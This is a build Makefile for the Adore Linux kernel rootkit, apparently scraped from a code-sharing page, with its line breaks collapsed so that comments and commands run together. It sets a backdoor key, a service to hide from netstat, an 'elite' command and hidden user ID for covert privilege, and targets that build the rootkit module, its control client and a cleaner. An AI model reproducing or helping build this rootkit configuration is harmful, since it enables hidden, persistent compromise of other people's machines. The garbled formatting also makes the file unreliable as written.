📄 makefile.gen
字号:
# Adore Makefile# (when configure fails)# Please set the flags you need!!!CC=cc CFLAGS=-O2 -Wall -I/usr/src/linux/includeCFLAGS+=-DADORE_KEY=\"mysecret\"# Normally not needed. Just for cross-plattform.# compilation#CFLAGS+=-m486# service to hide. something that appears# as netstat-outputCFLAGS+=-DHIDDEN_SERVICE="\":ssh\"" # should be changed to own valueCFLAGS+=-DELITE_CMD=30000# make sure this doesnt clash with existing usersCFLAGS+=-DELITE_UID=34# Do not touch!CFLAGS+=-DCURRENT_ADORE=32# enable when modversions are enables in kernel#CFLAGS+=-DMODVERSIONS# enable when target is SMP#CFLAGS+=-D__SMP__# this does not support exec-redirectionall: adore ava cleaneradore: adore.c rm -f adore.o $(CC) -c -I/usr/src/linux/include $(CFLAGS) adore.c -o adore.oava: ava.c libinvisible.c $(CC) $(CFLAGS) ava.c libinvisible.c -o avadummy: dummy.c $(CC) -c -I/usr/src/linux/include $(CFLAGS) dummy.crename: rename.c $(CC) -c -I/usr/src/linux/include $(CFLAGS) rename.c
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -